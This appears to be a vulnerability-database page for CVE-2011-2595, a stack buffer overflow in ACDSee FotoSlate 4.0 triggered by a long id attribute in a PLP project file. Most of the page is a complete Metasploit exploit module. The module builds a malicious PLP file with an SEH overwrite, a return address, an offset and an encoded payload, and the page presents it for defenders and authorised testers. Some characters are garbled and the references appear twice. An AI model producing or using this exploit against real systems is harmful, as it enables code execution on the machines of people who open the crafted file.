CVE-2011-2595
critical
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
Multiple stack-based buffer overflows in ACDSee FotoSlate 4.0 Build 146 allow remote attackers to execute arbitrary code via a long id parameter in a (1) String or (2) Int tag in a FotoSlate Project (aka PLP) file.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)
##
# $Id: acdsee_fotoslate_string.rb 13853 2011-10-10 16:47:33Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'ACDSee FotoSlate PLP File id Parameter Overflow',
'Description' => %q{
This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
a specially crafted id parameter in a String element. When viewing a malicious
PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
buffer and execute arbitrary code. This exploit has been tested on systems such as
Windows XP SP3, Windows Vista, and Windows 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'Version' => '$Revision: 13853 $',
'References' =>
[
[ 'CVE', '2011-2595' ],
[ 'OSVDB', '75425' ],
[ 'BID', '49558' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true'
},
'Payload' =>
{
#'Space' => 4000,
'BadChars' => "\x00\x22"
},
'Platform' => 'win',
'Targets' =>
[
[
'ACDSee FotoSlate 4.0 Build 146',
{
'Ret' => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
'Offset' => 1812,
'TotalLength' => 5000
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Sep 12 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
], self.class)
end
def exploit
overflow = rand_text(target["Offset"])
overflow << generate_seh_record(target.ret)
overflow << payload.encoded
overflow << rand_text_alpha(target["TotalLength"] - overflow.length)
plp =<<TEMPLATE
<?xml version="1.0" encoding="ISO-8859-1"?>
<ACDFotoSlateDocument15>
<PageDefinition>
<Template>
<Version>3.0</Version>
<Page>
<Name>Letter</Name>
<Properties>
<String id="#{overflow}"></String>
<String id="Width">8.500000IN</String>
<String id="Height">11.000000IN</String>
<String id="Orientation">Portrait</String>
<Bool id="AutoRotate">FALSE</Bool>
<Bool id="AutoFill">FALSE</Bool>
</Properties>
<Content>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGImageType">0</Int>
<String id="BGImageFile"></String>
<Int id="BGColor">16777215</Int>
</Content>
</Page>
<ToolList>
<Group>
<Tool>
<Name>Image</Name>
<Properties>
<String id="XPos">0.500000IN</String>
<String id="YPos">0.500000IN</String>
<String id="Width">7.500000IN</String>
<String id="Height">10.000000IN</String>
<Float id="Tilt">0.000000</Float>
</Properties>
<Content>
<Int id="ShapeType">0</Int>
<Float id="RoundRectX">0.000000</Float>
<Float id="RoundRectY">0.000000</Float>
<Bool id="ShrinkToFit">FALSE</Bool>
<Bool id="AutoRotate">FALSE</Bool>
<Float id="BorderWidth">0.000000</Float>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGColor">8454143</Int>
<Bool id="DropShadow">FALSE</Bool>
<Int id="DSColor">0</Int>
<Bool id="BevelEdge">FALSE</Bool>
<Bool id="Border">FALSE</Bool>
<Int id="BorderColor">16711680</Int>
<Bool id="IsLocked">FALSE</Bool>
</Content>
</Tool>
</Group>
</ToolList>
</Template>
<PageContent>
<Version>3.0</Version>
<Page>
<Name>Letter</Name>
<Content>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGImageType">0</Int>
<String id="BGImageFile"></String>
<Int id="BGColor">16777215</Int>
</Content>
</Page>
<ToolList>
<Group>
<Tool>
<Name>Image</Name>
<Content>
<Int id="ShapeType">0</Int>
<Float id="RoundRectX">0.000000</Float>
<Float id="RoundRectY">0.000000</Float>
<Bool id="ShrinkToFit">FALSE</Bool>
<Bool id="AutoRotate">FALSE</Bool>
<Float id="BorderWidth">0.000000</Float>
<Bool id="UseBGColor">FALSE</Bool>
<Int id="BGColor">8454143</Int>
<Bool id="DropShadow">FALSE</Bool>
<Int id="DSColor">0</Int>
<Bool id="BevelEdge">FALSE</Bool>
<Bool id="Border">FALSE</Bool>
<Int id="BorderColor">16711680</Int>
<Bool id="IsLocked">FALSE</Bool>
</Content>
</Tool>
</Group>
</ToolList>
</PageContent>
</PageDefinition>
</ACDFotoSlateDocument15>
TEMPLATE
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(plp)
end
end
=begin
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
using a long buffer in order to avoid the meterpreter possibly being broken.
=endMetasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| acdsee | fotoslate | 4.0 | |
References
- http://osvdb.org/75425
- http://secunia.com/advisories/44722
- http://www.securityfocus.com/bid/49558
- https://exchange.xforce.ibmcloud.com/vulnerabilities/69723
- http://osvdb.org/75425
- http://secunia.com/advisories/44722
- http://www.securityfocus.com/bid/49558
- https://exchange.xforce.ibmcloud.com/vulnerabilities/69723
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.